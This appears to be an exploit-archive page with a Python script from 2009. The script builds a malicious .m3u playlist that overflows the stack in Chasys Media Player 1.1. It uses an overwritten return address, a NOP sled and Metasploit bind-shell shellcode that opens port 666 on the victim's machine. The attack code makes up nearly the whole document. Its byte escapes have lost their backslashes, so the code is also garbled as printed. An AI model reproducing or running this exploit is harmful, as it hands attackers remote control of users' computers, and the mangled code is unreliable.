[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# Published : 2009-03-18
# Author : Encrypt3d.M!nd
# Previous Title : Chasys Media Player 1.1 (.pls) Stack Overflow Exploit #2
# Next Title : Icarus 2.0 (.PGN File) Local Stack Overflow Exploit (SEH)
#!/usr/bin/python
# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit
# By: Encrypt3d.M!nd
#
# Credit flys to: zAx
#
# the good thing in this one that the program won't crash
# when the playlist file imported,and will keep running.
header = "#EXTM3Un"
junk = "x41"*260
eip = "x2bx2ax49x7e" #user32.dll win/xp sp2
nops = "x90" * 20
# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
shellcode = (
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x77"
"x13x35x14x83xebxfcxe2xf4x8bx79xdex59x9fxeaxcaxeb"
"x88x73xbex78x53x37xbex51x4bx98x49x11x0fx12xdax9f"
"x38x0bxbex4bx57x12xdex5dxfcx27xbex15x99x22xf5x8d"
"xdbx97xf5x60x70xd2xffx19x76xd1xdexe0x4cx47x11x3c"
"x02xf6xbex4bx53x12xdex72xfcx1fx7ex9fx28x0fx34xff"
"x74x3fxbex9dx1bx37x29x75xb4x22xeex70xfcx50x05x9f"
"x37x1fxbex64x6bxbexbex54x7fx4dx5dx9ax39x1dxd9x44"
"x88xc5x53x47x11x7bx06x26x1fx64x46x26x28x47xcaxc4"
"x1fxd8xd8xe8x4cx43xcaxc2x28x9axd0x72xf6xfex3dx16"
"x22x79x37xebxa7x7bxecx1dx82xbex62xebxa1x40x66x47"
"x24x40x76x47x34x40xcaxc4x11x7bx37x8ex11x40xbcxf5"
"xe2x7bx91x0ex07xd4x62xebxa1x79x25x45x22xecxe5x7c"
"xd3xbex1bxfdx20xecxe3x47x22xecxe5x7cx92x5axb3x5d"
"x20xecxe3x44x23x47x60xebxa7x80x5dxf3x0exd5x4cx43"
"x88xc5x60xebxa7x75x5fx70x11x7bx56x79xfexf6x5fx44"
"x2ex3axf9x9dx90x79x71x9dx95x22xf5xe7xddxedx77x39"
"x89x51x19x87xfax69x0dxbfxdcxb8x5dx66x89xa0x23xeb"
"x02x57xcaxc2x2cx44x67x45x26x42x5fx15x26x42x60x45"
"x88xc3x5dxb9xaex16xfbx47x88xc5x5fxebx88x24xcaxc4"
"xfcx44xc9x97xb3x77xcaxc2x25xecxe5x7cx87x99x31x4b"
"x24xecxe3xebxa7x13x35x14")
ex = header+junk+eip+nops+shellcode
file=open("devil_inside.m3u","w")
file.write(ex)
file.close()
# www.Syue.com [2009-03-18]